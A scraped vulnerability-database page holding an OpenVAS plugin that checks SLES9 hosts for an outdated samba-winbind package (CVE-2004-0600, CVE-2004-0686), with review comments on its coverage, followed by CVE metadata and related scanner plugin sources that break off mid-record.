For more information, please visit the referenced security
advisories.
More details may also be found by searching for keyword
5016221 within the SuSE Enterprise Server 9 patch
database at http://download.novell.com/patch/finder/
# OpenVAS Vulnerability Test
# $Id: sles9p5016221.nasl 6666 2017-07-11 13:13:36Z cfischer $
# Description: Security update for samba
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# or at your option, GNU General Public License version 3,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
# Summary text attached to every result through script_tag(name:"summary")
# in the description block below. It lists the seven packages named by the
# update; the detection code at the end of this script compares only
# samba-winbind, so this list describes the advisory, not what is actually
# tested on the host.
tag_summary = "The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
samba-winbind
samba
samba-python
libsmbclient
libsmbclient-devel
samba-client
samba-pdb
For more information, please visit the referenced security
advisories.
More details may also be found by searching for keyword
5016221 within the SuSE Enterprise Server 9 patch
database at http://download.novell.com/patch/finder/";
# Remediation text attached through script_tag(name:"solution"). It names no
# fixed version; the only version recorded in this script is the
# samba-winbind~3.0.4~1.27 value used in the comparison further down.
tag_solution = "Please install the updates provided by SuSE.";
# Registration branch: taken only when `description` is set, and it ends with
# exit(0), so none of the detection code further down runs in that pass.
if (description)
{
  # Identity and revision bookkeeping for this plugin.
  script_id(65033);
  script_version("$Revision: 6666 $");
  script_tag(name:"last_modification", value:"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $");
  script_tag(name:"creation_date", value:"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)");

  # Both CVEs share the single CVSSv2 score below. On this page NVD lists that
  # vector (10.0) for CVE-2004-0600 and 5.0 for CVE-2004-0686, so the plugin
  # reports the higher of the two for any finding.
  script_cve_id("CVE-2004-0600", "CVE-2004-0686");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");

  script_name("SLES9: Security update for samba");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
  script_family("SuSE Local Security Checks");

  # The plugin is declared to depend on gather-package-list.nasl and on two
  # ssh/login/* knowledge-base keys.
  # NOTE(review): presumably those keys exist only after an authenticated SSH
  # login collected the RPM list - confirm. If so, a scan without working
  # credentials yields no result from this plugin, which must not be read as
  # "patched".
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/suse_sles", "ssh/login/rpms");

  # Result texts come from the tag_* variables assigned above this block.
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"summary", value:tag_summary);

  # qod_type "package": the finding rests on an installed-package version
  # comparison, not on probing the running samba service.
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");
# Detection: compare the installed samba-winbind RPM on SLES9.0 against
# 3.0.4-1.27 and collect whatever isrpmvuln() hands back.
# NOTE(review): isrpmvuln() and __pkg_match come from pkg-lib-rpm.inc, which is
# not shown here; presumably isrpmvuln() returns report text for an older
# installed package and NULL otherwise, and __pkg_match records that the named
# package was found - confirm against the include.
#
# Coverage caveat: samba-winbind is the only package compared, although the
# summary lists seven. If the library behaves as assumed, a host that has
# samba, samba-client or libsmbclient installed without samba-winbind gets
# neither a finding nor exit(99) from this code; treat a silent result as
# "not assessed" and verify those package versions separately.
report = "";

res = isrpmvuln(pkg:"samba-winbind", rpm:"samba-winbind~3.0.4~1.27", rls:"SLES9.0");
if (res != NULL) {
  report += res;
}

if (report == "") {
  # Nothing to report: signal "not vulnerable" only when the library saw the
  # package; otherwise fall off the end without a verdict.
  if (__pkg_match) {
    exit(99); # Not vulnerable.
  }
} else {
  security_message(data:report);
}
{"id": "OPENVAS:65033", "type": "openvas", "bulletinFamily": "scanner", "title": "SLES9: Security update for samba", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n samba-winbind\n samba\n samba-python\n libsmbclient\n libsmbclient-devel\n samba-client\n samba-pdb\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016221 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "published": "2009-10-10T00:00:00", "modified": "2017-07-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=65033", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "lastseen": "2017-07-26T08:55:49", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-07-26T08:55:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0686", "CVE-2004-0600"]}, {"type": "openvas", "idList": ["OPENVAS:54628", "OPENVAS:835144", "OPENVAS:136141256231065033", "OPENVAS:53922", "OPENVAS:136141256231053922", "OPENVAS:52420", "OPENVAS:1361412562310835144"]}, {"type": "slackware", "idList": ["SSA-2004-207-01"]}, {"type": "gentoo", "idList": ["GLSA-200407-21"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:6530", "SECURITYVULNS:DOC:6545"]}, {"type": "redhat", "idList": ["RHSA-2004:404", "RHSA-2004:259"]}, {"type": "nessus", "idList": ["SUSE_SA_2004_022.NASL", "GENTOO_GLSA-200407-21.NASL", "REDHAT-RHSA-2004-259.NASL", "REDHAT-RHSA-2004-404.NASL", "SAMBA_3_0_5.NASL", "SAMBA_MANGLING_OVERFLOW.NASL", "MANDRAKE_MDKSA-2004-071.NASL", "SLACKWARE_SSA_2004-207-01.NASL", "FREEBSD_SAMBA_304_4.NASL", 
"FREEBSD_PKG_2DE14F7ADAD911D8B59A00061BC2AD93.NASL"]}, {"type": "freebsd", "idList": ["2DE14F7A-DAD9-11D8-B59A-00061BC2AD93"]}, {"type": "suse", "idList": ["SUSE-SA:2004:022"]}, {"type": "exploitdb", "idList": ["EDB-ID:364"]}, {"type": "samba", "idList": ["SAMBA:CVE-2004-0686", "SAMBA:CVE-2004-0600"]}, {"type": "osvdb", "idList": ["OSVDB:8191", "OSVDB:8190"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:33855"]}], "modified": "2017-07-26T08:55:49", "rev": 2}, "vulnersScore": 7.5}, "pluginID": "65033", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5016221.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for samba\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n samba-winbind\n samba\n samba-python\n libsmbclient\n libsmbclient-devel\n samba-client\n samba-pdb\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016221 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65033);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for samba\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.0.4~1.27\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "SuSE Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T05:22:58", "description": "Buffer overflow in the Samba Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 allows remote attackers to execute arbitrary code via an invalid base-64 character during HTTP basic authentication.", "edition": 4, "cvss3": {}, "published": "2004-07-27T04:00:00", "title": "CVE-2004-0600", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0600"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.0.4", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.2a"], "id": "CVE-2004-0600", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0600", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:1.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:22:58", "description": "Buffer overflow in Samba 2.2.x to 2.2.9, and 3.0.0 to 3.0.4, when the \"mangling method = hash\" option is enabled in smb.conf, has unknown impact and attack vectors.", "edition": 4, "cvss3": {}, "published": "2004-07-27T04:00:00", "title": 
"CVE-2004-0686", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0686"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.0.0", "cpe:/a:samba:samba:3.0.1", "cpe:/a:samba:samba:3.0.4", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.2a"], "id": "CVE-2004-0686", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:1.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:56:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "Check for the Version of the CIFS Server", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835144", "href": "http://plugins.openvas.org/nasl.php?oid=835144", "type": "openvas", "title": "HP-UX Update for the CIFS Server HPSBUX01062", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for the CIFS Server HPSBUX01062\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote root access.\";\ntag_affected = \"the CIFS Server on\n HP-UX B.11.00, B.11.11, B.11.22, B.11.23 running the CIFS Server version \n A.01.11.01 and previous.\";\ntag_insight = \"A potential security vulnerability has been identifiedwith HP-UX running the \n CIFS Server where a buffer overflow may allow a remote user to gain root \n access.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00916390-1\");\n script_id(835144);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n 
script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"01062\");\n script_cve_id(\"CVE-2004-0686\", \"CVE-2004-0600\");\n script_name( \"HP-UX Update for the CIFS Server HPSBUX01062\");\n\n script_summary(\"Check for the Version of the CIFS Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:04", "bulletinFamily": 
"scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n samba-winbind\n samba\n samba-python\n libsmbclient\n libsmbclient-devel\n samba-client\n samba-pdb\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016221 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065033", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065033", "type": "openvas", "title": "SLES9: Security update for samba", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5016221.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for samba\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n samba-winbind\n samba\n samba-python\n libsmbclient\n libsmbclient-devel\n samba-client\n samba-pdb\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016221 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65033\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for samba\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.0.4~1.27\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "Check for the Version of the CIFS Server", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835144", "type": "openvas", "title": "HP-UX Update for the CIFS Server HPSBUX01062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for the CIFS Server HPSBUX01062\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote root access.\";\ntag_affected = \"the CIFS Server on\n HP-UX B.11.00, B.11.11, B.11.22, B.11.23 running the CIFS Server version \n A.01.11.01 and previous.\";\ntag_insight = \"A potential security vulnerability has been identifiedwith HP-UX running the \n CIFS Server where a buffer overflow may allow a remote user to gain root \n access.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00916390-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835144\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"01062\");\n script_cve_id(\"CVE-2004-0686\", \"CVE-2004-0600\");\n script_name( \"HP-UX Update for the CIFS Server HPSBUX01062\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of the CIFS Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : 
tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-207-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:53922", "href": "http://plugins.openvas.org/nasl.php?oid=53922", "type": "openvas", "title": "Slackware Advisory SSA:2004-207-01 new samba packages", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_207_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0 and -current\nto fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-207-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-207-01\";\n \nif(description)\n{\n script_id(53922);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-207-01 new samba packages \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
